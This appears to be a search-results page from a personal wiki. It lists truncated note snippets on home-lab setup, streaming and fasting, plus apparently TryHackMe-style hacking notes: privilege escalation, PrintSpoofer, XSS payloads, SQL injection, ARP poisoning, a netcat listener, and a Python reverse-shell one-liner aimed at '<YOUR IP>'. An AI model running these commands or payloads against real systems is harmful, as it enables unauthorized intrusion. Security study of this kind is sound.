Advanced Search
Search Results
125 total results found
AI Business
Streaming
Streaming Websites
Servarr Streaming
https://www.youtube.com/watch?v=LD8-Qr3B2-o
GitHub Tools
Open Source GitHub Tools
Analysis
Tools which are used for analysis
Operating Systems
Overview of different Operating Systems and their Purpose
AI Prompts
Good ChatGPT prompts which can be used.
Spotify Downloader via Web
Planned for custom song wishes for weddings.
Intervall Fasten
Plan für das Intervall Fasten
Designs
Image & Video
3D Printing
Krafttraining
Get the fuck out
GTFOBins GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate functions of Unix binaries that can be abused to get the fuck out beak out restricted shells...
SUID PrivEsc Python
SUID PrivEsc Python Some files has Permissions to be executed by any user with full permissions so that means that you can execute a file and the file will execute as root.So to escalate our privileges we need to search for the right SUID Permissions. find /...
Windows Vulnerabilities
Printspoofer PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10. To escalate privileges, the service account must have SeImpersonate privileges. To execute: PrintSpoofer.exe -i -c c...
WinLin PEAS
linPEAS LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts. Once you was able to get on a server you can run this script to see which vulnerabilities the system has.https://github.com/carlospolop/privilege-escalatio...
Stabilize a Shell
As soon you was able to get a shell on the target you can spawn a stabilized bash shell python -c 'import pty;pty.spawn("/bin/bash")' It would look like that: ┌──(togo㉿hackinglab)-[~/Hacking/THM/ignite]└─$ nc -lvnp 4444 ...
LFI - Local File Inclusion
An LFI vulnerability is found in various web applications. As an example, in the PHP, the following functions cause this kind of vulnerability: include require include_once require_once What is the risk of LFI? Once you find an LFI vulnerability, it is...
SQLi
SQL injection in general SQL Injection is when an attacker enters a malicious or malformed query to either retrieve or tamper data from a database. And in some cases, log into accounts. Method 1: true statement In an example navigate yourself to a log in....
ARP Poisoning
ARP Poisoning With ARP Poisoning you are able to be the Man in the middle and with that you can catch the network traffic from a specific device. ARP is used to discover devices in a network and say them which IP has the router. https://www.ettercap-project....
Plesk Preparations
Create a SSH account Create an SSH account before you try to connect. Go to your domain and click on Webhosting Access: There you can define a user or use your existing login to connect via SSH. To connect via SSH you need to connect through port 2121. ...
BookStack Installation
SSH into your cPanel server using your login credentials. Make sure you are in your home directory by running cd ~ Clone the release branch of the BookStack GitHub repository by runninggit clone https://github.com/BookStackApp/BookStack.git --branch release ...
URLs
https://www.warpconduit.net/2019/11/16/installing-bookstack-wiki-on-cpanel-shared-hosting/ https://www.bookstackapp.com/docs/admin/installation/ https://www.metanet.ch/support/713 https://www.metanet.ch/support/713#10224-php
Preparation
Requirements Hardware A Raspberry Pi 4B with 8 GB RAM It includes USB 3.0 A SSD Drive around 1TB. 32GB SD card for OS Storage Software Operating System: Raspberry Pi OS Lite 64-bit Important: OMV can't be installed on a Desktop vers...
XSS Payloads
File is attached but it was copied from: https://github.com/ismailtasdelen/xss-payload-list.git Some basic XSS Payloads: <SCRIPT>alert('XSS')</SCRIPT><IMG SRC="#" ONERROR="alert('XSS')"/><INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/><IFRAME SRC="javascrip...
PHP Reverse Shell
If you are able to upload your own files you can try to upload a PHP reverse shell and call it so a connection can be established. To catch the shell open a NetCat listener on your specified port. ns -lnvp <port> The PHP code for the reverse shell:https://g...
Python Reverse Shell
This is a python oneliner to open a shell in a case when you are allowed to execute python. python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<YOUR PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os....
win & lin PEAS
winPEAS https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS linPEAS https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Usernames, Passwords & Directories
Usernames & Passwords SecLists https://github.com/danielmiessler/SecLists SecLists contains usernames, passwords and several other payloads which are used in the wild. RockYou.txt One of the most famous password list. https://github.com/brannondors...
Raspberry Pi setup
Bake OS Download the Raspberry Pi imager from https://www.raspberrypi.com/software/ and install write the OS on your SD card. 1. Select: Raspberry Pi OS Lite (64-bit) 2. Select the SD card as Storage device 3. Define the hostname and enable SSH 4. Enter ...
Configure OpenMediaVault
First Login Enter the IP of your Raspberry in your Browser. Default credentials are admin:openmediavault. Change the password immediately! Configure File Services Make sure you connected the SSD to your Raspi. Scan your disk 1. Navigate to Storage ...
Raspberry Pi setup
Bake OS For this project you can also use a 32-bit system it doesn't matter to be honest Download the Raspberry Pi imager from https://www.raspberrypi.com/software/ and install write the OS on your SD card. 1. Select: Raspberry Pi OS Lite (64-bit) 2. Sele...